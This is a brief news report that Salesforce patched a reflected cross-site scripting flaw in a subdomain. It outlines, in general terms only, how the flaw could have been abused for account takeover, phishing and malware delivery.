Salesforce Patches Dangerous XSS Flaw

Salesforce.com has patched a cross site scripting flaw in a sub-domain which could have been exploited by hackers to hijack accounts or distribute malware.
“This subdomain was vulnerable to a reflected Cross-site Scripting (XSS) vulnerability where a specific function in the deployed application failed to sanitize and filter the arbitrary input passed by the remote user as a part of an HTTP request. As a result, the attacker could have executed JavaScript in the context of the application, thereby impacting the privacy and security of Salesforce users.”

There are three main ways that the flaw could be exploited, according to the firm.

The first could allow for account takeover if an attacker executes JavaScript to steal cookie and session identifiers.

Another involves the attacker forcing Salesforce users to visit phishing sites, or injecting pop-up windows designed for the same purpose.

Finally, a hacker could exploit the XSS flaw to force users to download malicious code on their machines by “executing unauthorized scripts in the context of the browser running a vulnerable application.”